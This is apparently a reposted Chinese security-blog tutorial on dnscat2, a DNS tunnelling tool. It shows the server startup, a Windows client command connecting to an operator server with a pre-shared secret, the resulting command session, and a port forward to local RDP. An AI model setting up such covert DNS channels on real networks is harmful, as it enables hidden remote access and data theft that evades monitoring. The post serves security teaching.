dnscat2 代理隧道

admin
admin
admin
138655
文章
114
评论
2023年12月15日19:12:28评论28 views字数 1775阅读5分55秒阅读模式

dnscat2 是一款基于 DNS 协议的代理隧道. 不仅支持端口转发, 另外还有执行命令, 文件传输等功能, 不过实测下来都不怎么好用.

其原理与 DNS Log 类似, 分为直连和中继两种模式, 前者直接连接服务端的 53 端口, 速度快, 但隐蔽性差, 后者通过对所设置域名的递归查询进行数据传输, 速度慢, 但隐蔽性好.

关于中继模式中的域名配置, 请参考 cobalt strike 的 dns_becaon

服务端由 ruby 编写, 客户端由 C 编写, 另有 powershell 版本.

# ruby dnscat2.rb
New window created: 0
New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = n/a]...

It looks like you didn't give me any domains to recognize!
That's cool, though, you can still use direct queries,
although those are less stealthy.

To talk directly to the server without a domain name, run:

  ./dnscat --dns server=x.x.x.x,port=53 --secret=33971b1d1593d219ac8ed615d5339180

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.

dnscat2>

每次运行都会有不同的 secret key 生成.

C:\> dnscat2.exe  --dns server=192.168.1.100,port=53 --secret=33971b1d1593d219ac8ed615d5339180
Creating DNS driver:
 domain = (null)
 host   = 0.0.0.0
 port   = 53
 type   = TXT,CNAME,MX
 server = 192.168.1.100

** Peer verified with pre-shared secret!

Session established!

在 dnscat2 中, 会话被称之为 window, 因为在会话间的切换需要用到 ctrl-z.

dnscat2> New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)

dnscat2> windows
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
  dns1 :: DNS Driver running on 0.0.0.0:53 domains =  [*]
  1 :: command (LAPTOP) [encrypted and verified] [*]
dnscat2>

创建一条端口转发.

(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command (LAPTOP) 1> listen 1234 127.0.0.1:3389
Listening on 0.0.0.0:1234, sending connections to 127.0.0.1:3389
command (LAPTOP) 1>

至于更多用法请参阅 README.MD

- By:X1r0z[exp10it.cn]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日19:12:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   dnscat2 代理隧道http://cn-sec.com/archives/2304655.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息